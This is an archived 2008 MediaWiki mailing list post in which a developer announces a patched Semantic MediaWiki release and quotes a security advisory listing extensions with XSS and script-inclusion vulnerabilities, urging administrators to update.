[Mediawiki-l] [Wikitech-l] Multiple security vulnerabilties in MediaWiki extensions

Markus Krötzsch mak at aifb.uni-karlsruhe.de
Sat Jun 14 14:44:11 UTC 2008


Thanks Tim! I have now backported your fixes in the current SVN version to the 
latest Semantic MediaWiki release 1.1.1. The updated release 1.1.2 can be 
obtained via Sourceforge [1] or SVN [2]. Updating existing SMW 1.1* 
installations can thus be done without moving to the development version, and 
without any additional side effects on the running wiki.

We will take care of preventing the "register_globals" issue in all future ...

Cheers,

Markus

[1] http://sourceforge.net/project/showfiles.php?group_id=147937
[2] 
http://svn.wikimedia.org/svnroot/mediawiki/tags/extensions/SemanticMediaWiki/


On Samstag, 14. Juni 2008, Tim Starling wrote:
> The following extensions had cross-site scripting (XSS) vulnerabilities:
> * geo
> * MetavidWiki
> * wikihiero
>
> These vulnerabilities are exploitable even if the extensions are
> disabled. If you have any of these extensions installed, please update
> them immediately.
>
> Many shared hosting services have the php.ini setting "register_globals"
> enabled, despite the fact that it is known to be detrimental to security.
>
> A new automated vulnerability scanner has found a large number of
> security vulnerabilities in MediaWiki extensions, when register_globals
> is enabled. Unless you are sure you have register_globals disabled, the
> following extensions should be immediately updated:
>
> Cross-site scripting vulnerabilities:
> * Call
> * ChangeAuthor
> * EditOwn
> * SignDocument
> * TemplateLink
> * WatchSubpages
> * WhoIsWatching
> * php/ext/MediaWiki
>
> Arbitrary script inclusion vulnerabilities:
> * CategoryIntersection
> * Makebot
> * PasswordReset
> * regexBlock
> * SemanticCalendar
> * SemanticForms
> * SemanticMediaWiki
> * SocialProfile
> * SpamRegex
> * StalePages
> * TodoTasks
> * WhiteList
> * Wikidata
>
> All these extensions are vulnerable regardless of whether they are
> enabled in LocalSettings.php. They only need to be installed, with their
> installation directory accessible from the public internet.
>
> Downloads in .tar.gz form for all these MediaWiki extensions are
> available from:
> http://www.mediawiki.org/wiki/Special:ExtensionDistributor
>
> Or using a subversion client from:
> http://svn.wikimedia.org/svnroot/mediawiki/trunk/extensions
>
> -- Tim Starling
>
> _______________________________________________
> Wikitech-l mailing list
> Wikitech-l at lists.wikimedia.org
> https://lists.wikimedia.org/mailman/listinfo/wikitech-l



-- 
Markus Krötzsch
Institut AIFB, Universität Karlsruhe (TH), 76128 Karlsruhe
phone +49 (0)721 608 7362          fax +49 (0)721 608 5998
mak at aifb.uni-karlsruhe.de          www  http://korrekt.org
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part.
Url : http://lists.wikimedia.org/pipermail/mediawiki-l/attachments/20080614/19bf19bc/attachment.pgp 


More information about the MediaWiki-l mailing list